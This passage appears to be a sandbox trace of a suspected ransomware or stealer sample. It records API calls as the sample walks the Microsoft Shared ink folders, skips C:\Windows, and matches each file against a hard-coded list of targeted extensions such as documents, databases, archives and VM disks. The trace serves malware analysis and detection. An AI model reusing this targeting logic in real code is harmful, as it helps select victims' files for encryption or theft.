lpFindFileData=0x2e4c4d8) returned 1 [0040.011] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.011] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" [0040.011] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.011] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.011] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.011] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.011] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.011] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.011] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="sv-SE" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE" [0040.011] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned 0x0 [0040.011] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*" [0040.011] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.013] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.013] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.013] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" [0040.013] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.014] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.014] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.014] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.014] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.014] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.014] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="TabIpsps.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" [0040.014] PathFindExtensionW (pszPath="TabIpsps.dll") returned=".dll" [0040.014] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.014] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.014] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.014] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tabskb.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tabskb.dll" [0040.015] PathFindExtensionW (pszPath="tabskb.dll") returned=".dll" [0040.015] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.015] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.015] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.015] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="TabTip.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabTip.exe" [0040.015] PathFindExtensionW (pszPath="TabTip.exe") returned=".exe" [0040.015] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.015] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.015] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.015] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="th-TH" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH" [0040.015] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned 0x0 [0040.015] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*" [0040.016] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.016] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.016] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.016] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\tipresx.dll.mui" [0040.017] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.017] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.017] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.017] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.017] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.017] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.017] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="TipBand.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" [0040.017] PathFindExtensionW (pszPath="TipBand.dll") returned=".dll" [0040.017] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.017] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.017] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.017] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="TipRes.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" [0040.017] PathFindExtensionW (pszPath="TipRes.dll") returned=".dll" [0040.017] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.017] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.017] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.017] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tipresx.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" [0040.018] PathFindExtensionW (pszPath="tipresx.dll") returned=".dll" [0040.018] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.018] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.018] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.018] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tipskins.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" [0040.018] PathFindExtensionW (pszPath="tipskins.dll") returned=".dll" [0040.018] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.018] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.018] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.018] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tiptsf.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" [0040.018] PathFindExtensionW (pszPath="tiptsf.dll") returned=".dll" [0040.018] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.018] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.018] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.018] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tpcps.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" [0040.018] PathFindExtensionW (pszPath="tpcps.dll") returned=".dll" [0040.018] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.018] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.018] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.019] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="tr-TR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR" [0040.019] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned 0x0 [0040.019] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*" [0040.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.019] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.019] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.019] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui" [0040.019] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.019] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.019] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.020] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.020] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.020] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.020] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="uk-UA" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA" [0040.020] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned 0x0 [0040.020] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*" [0040.020] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.020] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.021] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.021] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui" [0040.021] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.021] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.021] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.021] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.021] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.021] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.021] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="zh-CN" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN" [0040.021] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned 0x0 [0040.021] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*" [0040.021] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.023] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.023] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.023] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui" [0040.023] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.023] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.024] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.024] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.024] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.025] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.025] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="zh-TW" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW" [0040.025] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned 0x0 [0040.025] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*" [0040.025] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.026] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.026] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.026] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" [0040.026] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.026] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.026] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.026] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.026] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.026] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.026] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.026] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.026] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="MSInfo" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo" [0040.026] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned 0x0 [0040.026] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft 